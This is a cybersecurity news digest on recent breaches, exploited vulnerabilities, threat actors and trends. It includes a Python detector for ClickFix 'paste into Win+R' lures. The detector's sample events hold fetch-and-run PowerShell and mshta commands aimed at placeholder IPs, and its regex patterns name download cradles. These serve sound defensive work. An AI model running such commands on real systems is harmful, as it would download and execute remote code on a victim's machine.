Major Incidents or Breaches

  • Eurofiber France disclosed a data breach after hackers exploited a vulnerability in its ticket management system, resulting in exfiltration of customer information. The breach was discovered after the attacker attempted to sell the data.
  • Princeton University reported a data breach on 10 November 2025, exposing personal information of alumni, donors, faculty, and students.
  • DoorDash confirmed a data breach involving compromise of names, addresses, email addresses, and phone numbers after an employee was targeted in a social engineering attack.
  • The Pennsylvania Attorney General’s office confirmed a data breach following an August 2025 ransomware attack by the INC Ransom group, with personal and medical information stolen.
  • Logitech confirmed a data breach after being listed on the Cl0p ransomware group's leak site. The incident is linked to Cl0p's exploitation of Oracle E-Business Suite (CVE-2025-61882, see Notable Threat Actor Activity below).
  • Dutch police seized approximately 250 servers used by a bulletproof hosting service that provided infrastructure for cybercriminals.

Newly Discovered Vulnerabilities

  • Google released security updates for Chrome to address two vulnerabilities, including CVE-2025-xxxx, a V8 zero-day flaw under active exploitation, reportedly by a commercial spyware vendor.
  • A critical remote code execution vulnerability in Fortinet FortiWeb WAF is being actively exploited in the wild, allowing unauthenticated attackers to execute administrative commands.
  • The RondoDox botnet is exploiting CVE-2025-24893, a critical RCE vulnerability in XWiki Platform. Widespread exploitation has been observed, including by botnets, crypto miners, and custom tools.
  • Seven malicious npm packages are abusing Adspect, a cloud-based traffic-cloaking service, to fingerprint visitors: security researchers and scanners are redirected to harmless content while real victims are led to malicious payloads.
  • A vulnerability in DoorDash’s email systems allowed attackers to send spoofed, official-looking emails from DoorDash servers, creating a significant phishing risk. DoorDash has since patched the issue.
  • Researchers identified a security weakness in the AI-powered coding tool Cursor in which a malicious MCP server could hijack the tool's built-in browser to carry out credential-stealing attacks.

Notable Threat Actor Activity

  • The Dragon Breath threat actor is using a multi-stage loader (RONINGLOADER) to disable security tools and deploy a modified Gh0st RAT in recent campaigns.
  • Iranian state-sponsored APTs are targeting defense and government officials, including their family members, in ongoing campaigns to increase pressure on primary targets.
  • The Aisuru botnet launched a 15.72 Tbps DDoS attack against Microsoft Azure, sourced from over 500,000 IP addresses.
  • The EVALUSION ClickFix campaign is deploying Amatera Stealer and NetSupport RAT via social engineering techniques.
  • Cl0p ransomware group continues to exploit Oracle E-Business Suite (CVE-2025-61882), with associated data breaches including Logitech.
  • Scammers are sending fake copyright violation messages to steal X (formerly Twitter) logins.

Trends, Tools, or Tactics of Interest

  • Phishing attacks are increasingly shifting to non-email channels, with LinkedIn and other platforms now accounting for 1 in 3 phishing incidents.
  • ClickFix social engineering tactics are being widely adopted in malware distribution campaigns.
  • Malicious packages in open-source repositories such as npm are using cloud-based redirectors to evade detection and target victims.
  • Bulletproof hosting services remain a critical enabler for cybercriminal infrastructure, as evidenced by recent law enforcement action in the Netherlands.
  • Attackers are leveraging vulnerabilities in widely used platforms (e.g., XWiki, FortiWeb, Oracle E-Business Suite) for large-scale exploitation.
  • DDoS attacks are increasing in scale and sophistication, as demonstrated by the recent record-setting attack on Microsoft Azure.
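The EVALUSION campaign above and the broader ClickFix trend share one mechanic: a lure (typically a fake CAPTCHA or browser-error page) tells the user to press Win+R and paste a command, so the malicious interpreter is launched by explorer.exe with a download cradle and, often, a reassuring "I am not a robot" comment appended. The following is an added detection example written for this digest; it is not code from any vendor, report or campaign cited above. It assumes Sysmon Event ID 1 style field names (ParentImage, Image, CommandLine); the sample events, IP addresses and file names are constructed.

```python
"""Flag process-creation events consistent with ClickFix 'paste this into Win+R' lures.

Added example for this digest; not code from any vendor, report or campaign
cited above. Assumptions (labelled): events use Sysmon Event ID 1 style field
names (ParentImage, Image, CommandLine), and the sample events are constructed.
"""
import base64
import re

# Binaries a Win+R lure typically launches; the Run dialog runs them as children
# of explorer.exe, which is the parent relationship the first rule keys on.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "msiexec.exe", "bitsadmin.exe", "certutil.exe"}

# Content indicators evaluated over the raw command line plus any decoded
# -EncodedCommand payload. (name, compiled regex)
INDICATORS = [
    ("url", re.compile(r"https?://", re.I)),
    ("download_cradle", re.compile(
        r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
        r"downloadstring|start-bitstransfer)\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    # Lures often append a comment so the pasted text "looks like" a CAPTCHA
    # token; a '#' comment mentioning a robot check is a strong signal.
    ("captcha_comment", re.compile(
        r"#.*(not a robot|recaptcha|verification id|verify you are human)", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENC_RE = re.compile(r"[-/]e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(evt):
    """Score one process-creation event; returns indicators and a verdict."""
    parent = _basename(evt.get("ParentImage", ""))
    image = _basename(evt.get("Image", ""))
    cmdline = evt.get("CommandLine", "")
    hits = []
    if parent == "explorer.exe" and image in LOLBINS:
        hits.append("explorer_spawned_lolbin")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    for name, rx in INDICATORS:
        if rx.search(text):
            hits.append(name)
    # Verdict: the CAPTCHA-style comment alone is damning; otherwise require the
    # Run-dialog parentage plus at least one content indicator, so an admin
    # opening a bare PowerShell window from Explorer is not flagged.
    suspicious = ("captcha_comment" in hits
                  or ("explorer_spawned_lolbin" in hits and len(hits) >= 2))
    return {"suspicious": suspicious, "indicators": hits, "decoded": decoded}


def scan(events):
    """Return (index, analysis) for every event judged suspicious."""
    results = ((i, analyze_event(e)) for i, e in enumerate(events))
    return [(i, r) for i, r in results if r["suspicious"]]


# Constructed sample events (documentation IP ranges, invented file names).
_ENC = base64.b64encode("mshta http://198.51.100.7/a.hta".encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": 'powershell -w hidden -c "iex (irm http://198.51.100.7/verify.ps1)" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 4821"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": "powershell -nop -w hidden -enc " + _ENC},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://203.0.113.5/ver.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,   # benign: bare shell
     "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": _PS,  # benign: scheduled script
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for i, r in scan(SAMPLE_EVENTS):
        print(f"event {i}: {r['indicators']}")
```

Run against the constructed sample, the first three events are flagged and the two benign ones are not. In production the same logic applies to any source that records parent process and command line (Sysmon, EDR telemetry, Windows 4688 with command-line auditing enabled); decoding the -EncodedCommand payload before matching matters because the cradle and the remote URL are frequently hidden there. A complementary host-side check is the user's RunMRU registry key, which records what was typed into the Run dialog.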

Regulatory or Policy Developments Affecting the Security Industry

  • In the US, five individuals pleaded guilty to assisting North Korean IT workers in obtaining employment at US companies by providing false identities and remote access to company laptops, highlighting ongoing law enforcement efforts against supply chain and insider threats.
  • Microsoft released an out-of-band Windows 10 update (KB5072653) to address issues with installing Extended Security Updates, so that organizations still relying on Windows 10 can continue to receive ESU security patches.